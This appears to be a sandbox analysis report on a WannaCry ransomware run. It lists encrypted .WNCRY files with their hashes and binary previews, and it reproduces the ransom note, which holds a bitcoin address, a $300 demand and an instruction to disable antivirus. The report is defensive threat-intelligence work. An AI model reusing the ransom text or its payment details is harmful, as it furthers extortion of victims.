                                                  SHA-512:85B7D818C47F104FB70E7B739A59E12044F6C8DAC22D536EA1012D51CE9CB3503ABEA228F3B58D7F1EE2FE9E930770C2D842A46435527C11ACE464C17668F18D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.b.@..\..2)...H........O.U...(.k;D).....Efi?:..U...cL.6..%.E.!.1z....8..LR$G.|.|vmb./..U-{...T.0D.~..om..;.C.k......!j...b........J.gm.......*J}.G.sd%...`...u.......Yd;...eK..P.O.6Y&.xD.o.v..y........W+].....H.hb..R.....[ ......{....~...u.PH&.p~.q.f.q.c..L..!,l..i..T..r..3..c .x.zy.+.!Z......H.p..a.9..D.....B...[..tv.h.."..To.4@...K+.).r;U35....8."~HdxL.,.c..........8..w..@X.S...z'P...i...8..d....@..(.K.4..5i.j.i[....w.<.k.M3V,x....*.f....1/E/.......e/Y ,3.v......B.g_.,.\L.5....^...Ra..?.O%..E+~.......u..."e*...03..Z5....:.(a..#.m[..&........@....c#..Lv-.....n.-../..w..k..}A_B.7 ..c.....q.....B.L...&..Z>...nYV.{.......&.c.<j2...].(..".f...#..<._.B...Ai.#J.ElI1@.T<.3c8.[.E.eX.K...1H.....&....0.e.. &.r).W-.@...TX...A.u...[.Yt..a.$Yp........eYr.AI....k...fM?.....A..IS..[.....y..Uv...[Fl.A.....V..ad6?^..2"..$..sR.TW'[ .}9{L/....E...q..D......%X.>!.......d../{.os7f...n.{,.y..Ct.t.Y.y.5i.R{.E9.q..5N...........Z5.ElG|..29._y.ud.x.h]...h1y..>......'.F..

                                                  C:\Users\user\Desktop\GAOBCVIQIJ.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851700738108694
                                                  Encrypted:false
                                                  SSDEEP:24:bkSXKARmQO/enU6Aw3QHUXq6929nEesif64Km4AY6qFHryNVDbClmHw:bkS65/enUvUXf29nKu74AY6+2NRCX
                                                  MD5:BE409C9E0745A9515B4F613B130D2E93
                                                  SHA1:28CD61B0344C94D44A9C35F9D3398724406D6AD3
                                                  SHA-256:C6EE97A42721F31D33A8E8E3A955D8233191C83603631A6F86D41B274DB70C90
                                                  SHA-512:74ECDF6A5BB1482EB667F9FF898F7EB1692C27566D890E41B97D56972013EE46D2FCE438B8A511E360ABF38FDFB64D4AE6C6000554CD5433FE9BC24580FA40A2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....DI..%..z#.....I..D.1u.;....c.{F%..>.. ..x.r.C?.8....iNM0A .e... ..`..1..M.@.m.....??...'V......O[....eo.._)..S.2c.e..f]M.."..\..K.x.,.M.7..g..................ax........KN.J3*f|...f>..!_.t..mU.r........D....M.\..t{v..x.i.....a...^.)=O..........M.......................@.31b.....c\.......Qr....g...j|...#8..*......y4w3.q7$>H..U@......I.)a..w...1..fe.m..3....jCrWA.1.J......[.....#.S!G.~B..[.Q....89f.........n+M@....i..r.*..8............D..n..%5...?Bx.m...W......8.....>.Q.E.nr.[...A..9._..Qq.~H.^.!..W.X.?....,...%...H,i.K....Z,.......+e...i+(WJ..v.h....~.....o..E....s.`..K......K..1W.r..../..=j....@.j.J....{@.jg.7..{f..(.\.....4LV....$...0+..@.-u9....m.K......^....;...Y......wl4..R..Y.....{.......T.r..s_'.E.3.. .....!.D..W.t4d~......@...._.uGm.G....P.o}....'..F.X.N|.m`.+Yhy....."]..?......U..j..[d.<k.@^..........<.`.....N.!n.!3l..jq........2C....e./.T...Wa.'.4\yk.!..O.MHl6#./.~D....Q........x.3z(4CB.t...0.....T....c..1kG~....f.

                                                  C:\Users\user\Desktop\GAOBCVIQIJ.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851700738108694
                                                  Encrypted:false
                                                  SSDEEP:24:bkSXKARmQO/enU6Aw3QHUXq6929nEesif64Km4AY6qFHryNVDbClmHw:bkS65/enUvUXf29nKu74AY6+2NRCX
                                                  MD5:BE409C9E0745A9515B4F613B130D2E93
                                                  SHA1:28CD61B0344C94D44A9C35F9D3398724406D6AD3
                                                  SHA-256:C6EE97A42721F31D33A8E8E3A955D8233191C83603631A6F86D41B274DB70C90
                                                  SHA-512:74ECDF6A5BB1482EB667F9FF898F7EB1692C27566D890E41B97D56972013EE46D2FCE438B8A511E360ABF38FDFB64D4AE6C6000554CD5433FE9BC24580FA40A2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....DI..%..z#.....I..D.1u.;....c.{F%..>.. ..x.r.C?.8....iNM0A .e... ..`..1..M.@.m.....??...'V......O[....eo.._)..S.2c.e..f]M.."..\..K.x.,.M.7..g..................ax........KN.J3*f|...f>..!_.t..mU.r........D....M.\..t{v..x.i.....a...^.)=O..........M.......................@.31b.....c\.......Qr....g...j|...#8..*......y4w3.q7$>H..U@......I.)a..w...1..fe.m..3....jCrWA.1.J......[.....#.S!G.~B..[.Q....89f.........n+M@....i..r.*..8............D..n..%5...?Bx.m...W......8.....>.Q.E.nr.[...A..9._..Qq.~H.^.!..W.X.?....,...%...H,i.K....Z,.......+e...i+(WJ..v.h....~.....o..E....s.`..K......K..1W.r..../..=j....@.j.J....{@.jg.7..{f..(.\.....4LV....$...0+..@.-u9....m.K......^....;...Y......wl4..R..Y.....{.......T.r..s_'.E.3.. .....!.D..W.t4d~......@...._.uGm.G....P.o}....'..F.X.N|.m`.+Yhy....."]..?......U..j..[d.<k.@^..........<.`.....N.!n.!3l..jq........2C....e./.T...Wa.'.4\yk.!..O.MHl6#./.~D....Q........x.3z(4CB.t...0.....T....c..1kG~....f.

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.76968202850599
                                                  Encrypted:false
                                                  SSDEEP:24:rJma9DfS/rKJMifTHs+plIgi3jDIihV8IdgE:rJLtKzKvTHp53CC3E
                                                  MD5:79E68F1DCC5E07C5FBABAD70553F522C
                                                  SHA1:A0C6FD94C8E0BD670C1B32194DF55C4E7D49A317
                                                  SHA-256:E3AFA68887AB4FC363E29A0B074E8BC8BB6F187CB9243EFD8DACFC8FBF868E9A
                                                  SHA-512:DA71F5EB73AEAAF1295D602CEC68A4C2251ED7AA2FEE02DDDC39CF8BDB4D952E6975A99FF956199F69A1F8A1EB437BE52CDED43D00C437AB2C1AA4676885A5CC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.A...u.8P.C.F.<....wF.{.`...,...~..X&2....Q....7Db.1...|......S.R....T~.q..._h......{..f.....[BE?`~.]H.... wO... .>...M.B.....L..V..H.FV.C.q...n....W:D.......i;.....!.A.........c....%.t.~..0.*.......C....7..W.1#..o.....n...J.=!...63]l.........k..........k..Y......pK..k..I..er.....p..n0?.......h..x.....W....{p......"....A..6KZ...~...~.c..KRI..u..s...%z......2.....x....n.A.q..^.[qY$...{.a..).7!.J{D.<.#lBn...%.c}?........eM..P..Z....o....k....b...Tap..O.._....U.......P^.)2.TI.T.W)....5.81.....c.|.|.].#...Q.j..;A....,*....z`....&%6.......R?C2..)8..n.7.k;|....Z6H.I/.Y.....v...$....*.lx...t.,(.|V.......4...Dw.....+.h.q.2.=k.\.m.=....k{..T~o..........os+..}.0.R.JR=..d`...>..1.aQ.G..N)$.I.Q..d}}..],..).Q....rlne.%......k........F.Vt..w$9..._c.!*.|.f....\...?a.<P*8+q?)....:.VD..s....l..Y.`.rD.?.d[.`....\....%...g..-.L(..V....s...*.#....DC.....e\..<.k.....X.....yK.V.P...|.<*....Sr0g..&....'.O.......U..P..0..I..y.._....=...=..RAZ.i.j.n..G........O.8:

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\BJZFPPWAPT.png.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8328813258023375
                                                  Encrypted:false
                                                  SSDEEP:24:bkMsgzJl+zUzXBlLnIE7BX5H5qTq1V5NT2v4F9IJWMMvI06N:bkhg9vzXLnLh5ZqTq75wvkJlW
                                                  MD5:231114D2E1EB0A22FCE689955F75711F
                                                  SHA1:EC4A3BA8E79F70FE70D8BE5411DBB98528A961DF
                                                  SHA-256:76F9AEAD7EBCC5C9FB0180E592D4080A18817056EA6B2C40CF884432BB00CCBC
                                                  SHA-512:C91823E367926AEB69FCF6811EEA09EA8646317525BAEE4C5E87245E2CAAD6B4A7C64CE89128EE987464E0A82A139832F304892C0BDC34F717EC0700B586C850
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....E.|.G..|C..H..{..=.../.L..1.K.1.......n.......<.{O.7......v.Pwz-.~......1..T.d....e..G..|2....4.XP...6.....0..MGS.b..R....d0#...ZB>S......P...wS.E.k,Bx.=jT....BO..!.[...S...>..c....rg.6K.O%.~..{.s...n......5INF..M|...!'Q.TSNC..@*....&R..Q...y...............S......d[.7.L&...L ...I.WN.....y......Q/.....}5......:...\U.$....a.Q..u.a.f..ZO.....@^qU..]X...|3....Y..r....?...>..xx..v...d0...............b}_....\......VWC.?Oh./...)...wz...?...Q..m...:.%.4.. ^...zL.[.",.....#(.R_%.<.......4{..z.+...M...W0.<..n.a.7..p.N.+..WD.2K.U...f..1N..w....$.....i....6.,.2....(l......J."..F.J.p.~...l.^bj....$B1LB..?.. ...jWbh...i.+..."j........Ea....EcOX/......7........a.4..^.,..*S*T6..[.W........3.x/c....>....j..u........g\..A..N..B.2.1L....I?..2..p..a...>Wd-@./....Xw....{..3..x......X.xO@hW.B.Fk.B..F/..Y8t.Y~..| hA..v.xf.+n.L2..w...e.1O...:L..wz....v.d+9..D.............e....V.*-........I.5..Vb.i.=@..Y]....:`...P|k.4....)....d.6....iW!.w.....Q.vWt.3

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\BJZFPPWAPT.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8328813258023375
                                                  Encrypted:false
                                                  SSDEEP:24:bkMsgzJl+zUzXBlLnIE7BX5H5qTq1V5NT2v4F9IJWMMvI06N:bkhg9vzXLnLh5ZqTq75wvkJlW
                                                  MD5:231114D2E1EB0A22FCE689955F75711F
                                                  SHA1:EC4A3BA8E79F70FE70D8BE5411DBB98528A961DF
                                                  SHA-256:76F9AEAD7EBCC5C9FB0180E592D4080A18817056EA6B2C40CF884432BB00CCBC
                                                  SHA-512:C91823E367926AEB69FCF6811EEA09EA8646317525BAEE4C5E87245E2CAAD6B4A7C64CE89128EE987464E0A82A139832F304892C0BDC34F717EC0700B586C850
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....E.|.G..|C..H..{..=.../.L..1.K.1.......n.......<.{O.7......v.Pwz-.~......1..T.d....e..G..|2....4.XP...6.....0..MGS.b..R....d0#...ZB>S......P...wS.E.k,Bx.=jT....BO..!.[...S...>..c....rg.6K.O%.~..{.s...n......5INF..M|...!'Q.TSNC..@*....&R..Q...y...............S......d[.7.L&...L ...I.WN.....y......Q/.....}5......:...\U.$....a.Q..u.a.f..ZO.....@^qU..]X...|3....Y..r....?...>..xx..v...d0...............b}_....\......VWC.?Oh./...)...wz...?...Q..m...:.%.4.. ^...zL.[.",.....#(.R_%.<.......4{..z.+...M...W0.<..n.a.7..p.N.+..WD.2K.U...f..1N..w....$.....i....6.,.2....(l......J."..F.J.p.~...l.^bj....$B1LB..?.. ...jWbh...i.+..."j........Ea....EcOX/......7........a.4..^.,..*S*T6..[.W........3.x/c....>....j..u........g\..A..N..B.2.1L....I?..2..p..a...>Wd-@./....Xw....{..3..x......X.xO@hW.B.Fk.B..F/..Y8t.Y~..| hA..v.xf.+n.L2..w...e.1O...:L..wz....v.d+9..D.............e....V.*-........I.5..Vb.i.=@..Y]....:`...P|k.4....)....d.6....iW!.w.....Q.vWt.3

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\BNAGMGSPLO.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.802905153358807
                                                  Encrypted:false
                                                  SSDEEP:24:mFlZaLqINNM7vad6xWRIieMh50uHM6ceLbnnXMq:m1aLqINNSad6xWRIiDh5Zs8n8q
                                                  MD5:6956AB587CC992071A6C4F586D677948
                                                  SHA1:04D586ACA852F4412DE330A0998F49F704A0EFC6
                                                  SHA-256:E104E1C1A6532BC1ADCE6FCAD376134DFCB5BB97E6CEC589D08BBDA0FAD68A23
                                                  SHA-512:AA271610BE37E0925B4282592DD8D7470EDB367DBA2D749C848B59719DA12C046B041CE97DB3170B238A735C48EFE919F091EEEE3D6A00CD351B56D95C31E2C5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:pt..... ..Z..=.\a...~|.;{..Q_3.7%..$.<.m...0"]j..-.M.U.&h...l..,^.w?c..(..-..X.G..f...X...-...A..~+a.rG.c....../.Z..(%>W.I.*?&...j.c.........X...]azw$..5.D>.^R.t.........8\:.@c2.e.M.....Q.~t..>.@.(..7[%...6.m.6./xh.X..[.!."...E.3t.a....=.... NhsA....]........].L.e. ....D.;.ocF8.o...W..X.y.p..^t..(./`G.T....6.WS.5.b....e"..95d._.r.!..8w.wz.... ...q....4a....:..&...-3.o..{$..+.(..4H...Z2.8....... ..K.rI.o.0z*..Q.'....T+*; ..`V......o.G..Pyc#..R..b.M.....O..r:.)X../..V....^.N..o{.m,..'.\V..{../$..f7..1R.b a...m..]w+.woGhM..S......lT)..c..P..a...,...)H.o.?2.0.I...+.6..{.m.:....h...^~5&.z.v.U..= Wr....,.%.A.v.J.k...d?\&C>.d.j...2,...s...>aV..?v.Do.L!.YA>C.\...x.....ub.,".Q......xA.e+.n...t.4.......o*.'....5\...8!v2.$.........A........{..H...H.@.v..u....6.2..pe.Qz=F....d.-...............[.z...Y.%:c...QA...q.k.kb..F.....f_..x>.....c..S/..wn...SM....}.[.fFH-.Tvh......&...Xn.H...JD,.b.e..*.GOBoh.g....x.;..c~.5s.:a4.f.t.&.W.....k....Z.1..

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\BNAGMGSPLO.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.855615998473397
                                                  Encrypted:false
                                                  SSDEEP:24:bkVEVKxCxoeH7DM/7++XhY/qr21W3YpG0Q4sSN4l/u/gKW0WBbC/Jm93+r:bkqKxCxo2Dm7++XcM2M3YJhmu/ZW0WRa
                                                  MD5:E3D9D563443856AF38393E29AB651A30
                                                  SHA1:63E623F249A9552B610E6ADBB8CEADAAAD19CB77
                                                  SHA-256:4F8061C91CCAEF616B29C409064099C6889F56E5E295100CF3614B7E92D686B4
                                                  SHA-512:3DF52BE0F0915F99381B75093C2EAECED18ADB4693A06EE7C33B19C9D68BAE701B3B2C027A0F1D5A109A3B5FED9132783C4879E924CBBEF33AD3482C86E1634C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!........f.M...L..`.S..u..gF.2.....&%....3#...:..S.v.n.o...J..~..Y.=.=....C...m1M)..b.mt.t.....Z.L.a.(...Q.0.p=.R6.Y...=|G....h..B..e6...s....E..?....P..>..[..&I^..waF..U...C.....)...4]."..O.5..58..<...o_.}a';.m..I./..S..r.=%....1.M(.....".LH................Y....}.W..c....3..v.]\EY.].......i..!..".b.L...u6U\... t.bY.)......f..2,.a...F.....c.|Y...-..x.Uc....C.t.....P....Z...H.^.z...M.a..a..._.Kg*.%4E....Y.o.N...S.5-..K....hl......\."..\...~..^..o.,}v....'.+.2...7...{.G...(8.Y.c..dY.....s%l=..l.......J3..7.U-....H|...F.XG.............W...__.q.dk.w.. .mR.....a.]..f..._..G^b.M2..."v...*....'.(.....XB.....D.saN....T....1..T....bD.l....{..\..^..1DK#3Q.&ST..6&.Q../..>....1M..~\>X.W...m....y.d.ML....s.[....?..,."|{..u.N.....Y.R...z.Y.a....ta..[^p7.......H.....8.=..............=..?.F .R9....C..eF[qJE..64.-.).+s..p.....i.3....:...Q/.v.....s...V......2..i.X...*@.!.`.x..#.....J.\.....=X..V..9.-..Qe..6..)s..O....5.B.....K.8.k.bi.

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\BNAGMGSPLO.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.855615998473397
                                                  Encrypted:false
                                                  SSDEEP:24:bkVEVKxCxoeH7DM/7++XhY/qr21W3YpG0Q4sSN4l/u/gKW0WBbC/Jm93+r:bkqKxCxo2Dm7++XcM2M3YJhmu/ZW0WRa
                                                  MD5:E3D9D563443856AF38393E29AB651A30
                                                  SHA1:63E623F249A9552B610E6ADBB8CEADAAAD19CB77
                                                  SHA-256:4F8061C91CCAEF616B29C409064099C6889F56E5E295100CF3614B7E92D686B4
                                                  SHA-512:3DF52BE0F0915F99381B75093C2EAECED18ADB4693A06EE7C33B19C9D68BAE701B3B2C027A0F1D5A109A3B5FED9132783C4879E924CBBEF33AD3482C86E1634C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!........f.M...L..`.S..u..gF.2.....&%....3#...:..S.v.n.o...J..~..Y.=.=....C...m1M)..b.mt.t.....Z.L.a.(...Q.0.p=.R6.Y...=|G....h..B..e6...s....E..?....P..>..[..&I^..waF..U...C.....)...4]."..O.5..58..<...o_.}a';.m..I./..S..r.=%....1.M(.....".LH................Y....}.W..c....3..v.]\EY.].......i..!..".b.L...u6U\... t.bY.)......f..2,.a...F.....c.|Y...-..x.Uc....C.t.....P....Z...H.^.z...M.a..a..._.Kg*.%4E....Y.o.N...S.5-..K....hl......\."..\...~..^..o.,}v....'.+.2...7...{.G...(8.Y.c..dY.....s%l=..l.......J3..7.U-....H|...F.XG.............W...__.q.dk.w.. .mR.....a.]..f..._..G^b.M2..."v...*....'.(.....XB.....D.saN....T....1..T....bD.l....{..\..^..1DK#3Q.&ST..6&.Q../..>....1M..~\>X.W...m....y.d.ML....s.[....?..,."|{..u.N.....Y.R...z.Y.a....ta..[^p7.......H.....8.=..............=..?.F .R9....C..eF[qJE..64.-.).+s..p.....i.3....:...Q/.v.....s...V......2..i.X...*@.!.`.x..#.....J.\.....=X..V..9.-..Qe..6..)s..O....5.B.....K.8.k.bi.

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\EOWRVPQCCS.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.832741916318372
                                                  Encrypted:false
                                                  SSDEEP:24:H43gtwCmQg2DcT31E2iLEbx5/erBbwd0ptGgqXrQQFD:pTmoD+31CLyx5/iBttGl7nJ
                                                  MD5:CFFDDB2A7B723F1893B65F6F49CA33E5
                                                  SHA1:8D6492AE40DDC55F60CE73732001EE37B1E07A73
                                                  SHA-256:653E4D8D5D307651578323A7CBAE9C59A7AE1A76C95D84DB49E32D7B5B8AAE5A
                                                  SHA-512:EC65305B9805634B3C1DE2C0DA4ABBE78CEC1D233653F7D1E554B92C9C0E26D681A0C05CC0CA16B3521A8A3AFCC764BC74DEE73FB58A951651624C698B8F7586
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:'..J.9.G....{....8.._..%.lY..B.....1.....N.&.=....$...g......".M..vH@..[*..0f...Z^|i.}..G..]....A..~8.h.....$'.e...Y...qTy......Q...'F.G..k.....NO<..ka...[p..v....Rg2.*S.3...X.-...j..../......[W.e..;..S|.&U8.........@UR.......`9......+...d#c.~...1v}(...[.G..q:mjv..T.k..,voC4;..u.p....FB.It.C.g.....}....x...Q`0.{...L..5...kw.1...4...(.8.....&.'.sK.......q..R.....aDN;....x.....Fji......2.y1._3Q.}..L.b.V....[....r.O7-...%..oD.'j.g.\...nP...Gn..]..>....@..{"..5....)X\ (.)..n.....m/...wK..6Q..Ph......>..2N..4....".$s..g.."7hS..v....zO:....T|.|..[p}.T2Mv......<].c.ND....*..\..........1y.id.e6m..Z.+%y(..{.F..4...~....Y....4F.s...].s.P..,..ez.z...9..*.2...=OkM/.E........N..5.Ub....&...E....O.........D.%D....P0...=..]5.0|...P.....$...0PC...1...r...D...q.T!R...X.?XE..:.\ t).;P...&..W..ZRV.q....h.....C.RAh.j8#.Ap._..H.....Z .Vy..;L.w.r..YVX...[k.u...u.y$y..q...,..W`..~.A...zT...a.p..,W/....[`+3z..nK/.$..i]Ut.......<9...|...=.bF....T.._..hoG..

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\EOWRVPQCCS.mp3.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.830648899192845
                                                  Encrypted:false
                                                  SSDEEP:24:bkR8Avu2TATL8hjku7ErmukFA/qOHTGcyvhr8cmI2V4PMMCQBgqdGxfPB:bkR8CuIoPkRKFqgI2oBOG8PB
                                                  MD5:D1D6C1CBEEB2F8CD9A638ACD113D7839
                                                  SHA1:CF189F8E3F0DFFF85BE3B969DFCF10F57A5167D0
                                                  SHA-256:35BDA811A0010540F563175697657F6A1536008C04A2D0D430C7BE53736B0817
                                                  SHA-512:C8F14ABD2765A4699C726894E34F6EE35C06698881E2F43A613004DD39F6A375FC52003E4996F992AC061BBA345AC38A1BDF21D5DCFAB77A96780F48B7D3AD78
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......13..L_..uhH..?.......j..7...<...f..I.....K...>vR..f..?....cV-.rc...'...'.....kK..4.Z+...EZhK.aqI..M.M..?...LbDgR....8.e.......q.<.)-.2.9...o..9'...Vj..Q..f.....N[F...S."m....2k6./.....hW.a...Y..{(.....EGj....S...B....7..@.KO.i...0........o..............bo{g.5n.m..1.I3.....K....J',.%...].7....X..-....j8.Q0=.C......OR.uk.<q{.._..Lq.q.......h........AG._...z.*O.Fl.B.J...V..Pk.[............G..No.Q..#.-/..).ELD..>.c.=.I.Q.F.(..q..<M..XYk.....!..vgE|...!.&....x....t.sf.?..<.....L.I.........:?#.i..N.m..hu...[.1.?.e#.. ..L.....5U*8.#....M...b......6...l.gop....`!h._...:.s..../....hb+s.e...".K.J?A]..4.Y.w.F.................m$'7.*q..mC.....;.v.\...ZMO.).&1....!.Dxdy.t.-.oN.3....b.p.Z.H.m.Y.7....W...=...}.....MvK>5..b'.. ...J...v.p.?}`_...<rf...o....L}......7...L.PU..oF.w!..J...9K..p.Z...j.E....q_..x..........S...K.Ur.{.r...e3.)v.+-..p...`..@f.0..V."#..N..p......=.4......h.a.i..c.a...S.....{,..}....KIL =9.C..m.....)..........1XA.....

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\EOWRVPQCCS.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.830648899192845
                                                  Encrypted:false
                                                  SSDEEP:24:bkR8Avu2TATL8hjku7ErmukFA/qOHTGcyvhr8cmI2V4PMMCQBgqdGxfPB:bkR8CuIoPkRKFqgI2oBOG8PB
                                                  MD5:D1D6C1CBEEB2F8CD9A638ACD113D7839
                                                  SHA1:CF189F8E3F0DFFF85BE3B969DFCF10F57A5167D0
                                                  SHA-256:35BDA811A0010540F563175697657F6A1536008C04A2D0D430C7BE53736B0817
                                                  SHA-512:C8F14ABD2765A4699C726894E34F6EE35C06698881E2F43A613004DD39F6A375FC52003E4996F992AC061BBA345AC38A1BDF21D5DCFAB77A96780F48B7D3AD78
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......13..L_..uhH..?.......j..7...<...f..I.....K...>vR..f..?....cV-.rc...'...'.....kK..4.Z+...EZhK.aqI..M.M..?...LbDgR....8.e.......q.<.)-.2.9...o..9'...Vj..Q..f.....N[F...S."m....2k6./.....hW.a...Y..{(.....EGj....S...B....7..@.KO.i...0........o..............bo{g.5n.m..1.I3.....K....J',.%...].7....X..-....j8.Q0=.C......OR.uk.<q{.._..Lq.q.......h........AG._...z.*O.Fl.B.J...V..Pk.[............G..No.Q..#.-/..).ELD..>.c.=.I.Q.F.(..q..<M..XYk.....!..vgE|...!.&....x....t.sf.?..<.....L.I.........:?#.i..N.m..hu...[.1.?.e#.. ..L.....5U*8.#....M...b......6...l.gop....`!h._...:.s..../....hb+s.e...".K.J?A]..4.Y.w.F.................m$'7.*q..mC.....;.v.\...ZMO.).&1....!.Dxdy.t.-.oN.3....b.p.Z.H.m.Y.7....W...=...}.....MvK>5..b'.. ...J...v.p.?}`_...<rf...o....L}......7...L.PU..oF.w!..J...9K..p.Z...j.E....q_..x..........S...K.Ur.{.r...e3.)v.+-..p...`..@f.0..V."#..N..p......=.4......h.a.i..c.a...S.....{,..}....KIL =9.C..m.....)..........1XA.....

                                                  C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.822510363879958
                                                  Encrypted:false
                                                  SSDEEP:24:lpEWqPNgGPxlcblmfaCJZcbSx66KjZE3XH2JnA9mQsMikNxJV:fbql/glmNJZiSjX2Zo7EK
                                                  MD5:5D7F1BDA9DF0FEC50FAD1C766526A4FC
                                                  SHA1:CA18AEDB6898EE6774D1B9CD58F050BC698B7863
